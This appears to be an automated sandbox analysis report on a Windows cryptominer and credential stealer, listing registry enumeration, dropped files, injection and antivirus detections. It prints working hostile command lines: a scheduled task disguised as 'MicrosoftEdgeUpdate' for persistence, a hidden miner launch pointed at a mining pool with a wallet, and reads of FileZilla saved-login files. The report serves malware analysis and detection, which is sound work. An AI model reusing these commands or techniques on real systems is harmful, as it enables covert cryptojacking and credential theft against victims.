RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: WIC base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExW April 22, 2025, 11:55 a.m.	regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x00000534 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	net session
cmdline	schtasks /Create /F /SC ONLOGON /RL HIGHEST /TN "MicrosoftEdgeUpdate" /TR "\"C:\Users\test22\AppData\Roaming\SystemService\miner_loop.bat\"" /RU "test22"

Communicates with host for which no DNS query was performed (1 event)

host

193.233.237.109

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation April 22, 2025, 11:55 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Installs itself for autorun at Windows startup (1 event)

cmdline

schtasks /Create /F /SC ONLOGON /RL HIGHEST /TN "MicrosoftEdgeUpdate" /TR "\"C:\Users\test22\AppData\Roaming\SystemService\miner_loop.bat\"" /RU "test22"

Created a service where a service was also not started (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceW April 22, 2025, 11:55 a.m.	service_start_name: start_type: 3 password: display_name: WinRing0_1_2_0 filepath: C:\Users\test22\AppData\Local\Temp\SystemService\WinRing0x64.sys service_name: WinRing0_1_2_0 filepath_r: C:\Users\test22\AppData\Local\Temp\SystemService\WinRing0x64.sys desired_access: 983551 service_handle: 0x00000000004296c0 error_control: 1 service_type: 1 service_manager_handle: 0x0000000000429690	1	4363968	0

Drops a binary and executes it (3 events)

file	C:\Users\test22\AppData\Local\Temp\SystemService\install.bat
file	C:\Users\test22\AppData\Local\Temp\SystemService\crypted.exe
file	C:\Users\test22\AppData\Local\Temp\SystemService\sysdrv.exe

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Collects information about installed applications (38 events)

Time & API	Arguments	Status
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExW April 22, 2025, 11:55 a.m.	key_handle: 0x00000538 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	C:\Users\test22\AppData\Local\Temp\SystemService\sysdrv.exe --url pool.hashvault.pro:443 --user 82tLCbM64D89VX5zsHwjYpCu4WftAMF9AHzc5sd2ZLmHZBUZdwX6UJzEY1w4bwK5PhV4Tsh7kNUGXS8CynaTsvkADvcbvP6.TEST22-PC --pass x --donate-level 1 --tls --cpu-max-threads-hint=25
parent_process	powershell.exe				martian_process	"C:\Users\test22\AppData\Local\Temp\SystemService\sysdrv.exe" --url pool.hashvault.pro:443 --user 82tLCbM64D89VX5zsHwjYpCu4WftAMF9AHzc5sd2ZLmHZBUZdwX6UJzEY1w4bwK5PhV4Tsh7kNUGXS8CynaTsvkADvcbvP6.TEST22-PC --pass x --donate-level 1 --tls --cpu-max-threads-hint=25

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2228 resumed a thread in remote process 2512
Process injection	Process 2228 resumed a thread in remote process 2600
NtResumeThread April 22, 2025, 11:47 a.m.	thread_handle: 0x000000000000006c suspend_count: 0 process_identifier: 2512	1	0	0
NtResumeThread April 22, 2025, 11:47 a.m.	thread_handle: 0x0000000000000074 suspend_count: 0 process_identifier: 2600	1	0	0

Creates a suspicious Powershell process (1 event)

option

-windowstyle hidden

value

Attempts to execute command with a hidden window

Uses Sysinternals tools in order to add additional command line functionality (1 event)

cmdline

schtasks /Create /F /SC ONLOGON /RL HIGHEST /TN "MicrosoftEdgeUpdate" /TR "\"C:\Users\test22\AppData\Roaming\SystemService\miner_loop.bat\"" /RU "test22"

Detects Virtual Machines through their custom firmware (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation April 22, 2025, 11:55 a.m.	information_class: 76 (SystemFirmwareTableInformation)		-1073741789	0

File has been identified by 46 AntiVirus engines on VirusTotal as malicious (46 events)

Bkav	W64.AIDetectMalware
Lionic	Trojan.Win32.Redline.b!c
Skyhigh	BehavesLike.Win64.Generic.vc
ALYac	Gen:Variant.Jalapeno.421
Cylance	Unsafe
VIPRE	Gen:Variant.Jalapeno.421
CrowdStrike	win/malicious_confidence_90% (W)
BitDefender	Gen:Variant.Jalapeno.421
Arcabit	Trojan.Jalapeno.421
VirIT	Trojan.Win32.MSIL_Heur.A
Symantec	Trojan.Gen.MBT
Elastic	malicious (high confidence)
ESET-NOD32	multiple detections
APEX	Malicious
Avast	Win64:Evo-gen [Trj]
Kaspersky	HEUR:Trojan-Dropper.Win32.Miner.gen
Alibaba	Trojan:Win32/Coinminer.449
MicroWorld-eScan	Gen:Variant.Jalapeno.421
Rising	Stealer.RedLine!1.11745 (CLASSIC)
Emsisoft	Gen:Variant.Jalapeno.421 (B)
F-Secure	PotentialRisk.PUA/CoinMiner.Gen
DrWeb	Trojan.PWS.Stealer.38294
TrendMicro	Trojan.Win64.AMADEY.YXFDTZ
